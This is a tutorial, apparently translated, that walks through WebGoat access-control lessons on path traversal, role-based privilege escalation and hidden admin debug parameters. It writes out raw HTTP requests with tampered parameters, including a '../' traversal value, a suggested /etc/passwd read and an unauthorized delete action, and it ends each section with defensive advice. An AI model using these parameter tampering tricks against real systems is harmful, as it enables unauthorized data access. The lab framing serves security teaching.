Webgoat learning-access control flaws)

In a role-based access control solution, a role represents a group of access permissions and privileges. A user can be assigned one or more roles. A role-based access control solution usually consists of two parts: Role permission management and role allocation. A compromised role-based access control scheme may allow a user to execute a role that does not allow him/her to be assigned, or in some way allow privilege escalation to access by an unauthorized role.

1. Path-Based Access Control Bypass Solution

In a path-based access control solution, attackers can traverse paths by providing relative path information. Therefore, attackers can use relative paths to access files that are usually rejected by no one who can directly access or directly request them.

For example, in a permission-based seller management system, each seller can only perform operations on his/her own order information and product information. Now there are seller A and seller B. The product information of a is stored under/webapps/A/, for example,/webapps/A/item1.html. A can access its product information through the product list interface. After the server authenticates a, it returns the product list under directory A to the client. A sends an access request to the server when browsing its own products. The request is as follows:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCFile=item1.html&SUBMIT=View+File

After receiving the request, the server receives item1.html in the directory A and returns the result to the client. Careless programmers did not re-verify the seller's access to the directory when obtaining the product details. hackers may resort to this negligence by modifying parameters to cheat the server. For example, modify the request parameters as follows:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCFile=../B/xxx.html&SUBMIT=View+File

After receiving the request, the server verifies that user a is logged on and then sets the root directory to/webapps/A/access .. /B/xxx.html: the seller B's product information/webapps/B/xxx.html is actually accessed, and the product details (including cost price information) of B are leaked to seller. More vulnerable systems may cause leakage of important information, such as setting the file parameter in the request to/etc/passwd or/etc/passwd, the system user information may be obtained, resulting in more serious losses.

2. Role-Based Access Control

Many websites use role-based methods to strictly restrict resource access, but developers are prone to negligence in implementing such solutions. For example, for resource s, both Tom and John have access permissions. John can modify and delete resource s as opposed to Tom. After the client Tom logs on to the system, the server returns the access permission of Tom and the HTML page containing only the View button:

After Jone logs on to the system, the server returns the HTML page with view and delete:

Click Delete to send the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCemployee_id=105&action=DeleteProfile　

After receiving the preceding request, the server executes the delete operation. When viewing resource s, Tom sends the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 34Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCemployee_id=105&action=ViewProfile　　

After Tom knows the above information, he can try to modify his post parameter and change the post parameter string to employee_id = 105 & Action = deleteprofile and send it to the server. Careless programmers neglected to re-verify Tom's permissions, causing Tom to successfully execute John's delete permission. In the same way, Tom modifies the URL to perform the system administrator Admin Operation, which threatens the server.

In the view request, Tom can view detailed information about the relevant information.

From the above request parameters, we can see that the data ID is represented by employee_id. If you try to modify employee_id = 101 to resend the request, the server will receive the following response:

He successfully bypassed the display layer to access Larry's documents.

To prevent the preceding operations, server services must strengthen the filtering and verification of Request Parameters and verify permissions. Do not trust the previous operations in each request, or trust all external input parameters, enhance verification, especially for sensitive operations such as payment, deletion, and price change. If multiple interfaces provide external services together, we can place the entire process in an ideal environment through the packaging of the presentation layer and the internal jump logic, however, as long as each interface is independent, hackers will exploit it to create unreasonable requests. Therefore, when designing the system, do not just consider what the normal situation is, but also consider exceptions (artificial) to handle the situation, it is necessary to perform strict parameter verification and permission verification in each step, and adhere to the untrusted principle.

3. Remote Access Management

Many website developers reserve related parameter interfaces in the script. Once this parameter is confirmed by the background program, the visitor's permissions will be enlarged and browsed to previously inaccessible resources, such: program debugging logs, hidden function menus, and so on. For example, you want to set a parameter admin = true for an interface so that developers can open debugging information or background data for debugging anywhere. For example, http: // localhost: 8080/webgoat/attack? The screen = 28 & menu = 2000 page only displays the user's identity information. If developers prefer to perform some debugging and modify the URL to http: // localhost: 8080/webgoat/attack? Screen = 28 & menu = 2000 & Admin = true. The server returns the details of all users, facilitating debugging on the Internet.

 

Debugging on the internet is convenient, but it is convenient for you and illegal personnel. There is no secret on the Internet. Once the password is obtained by someone else, the corresponding service can be attacked, this may cause unnecessary losses. In actual operations, make sure that the Internet Service disables the corresponding debugging function.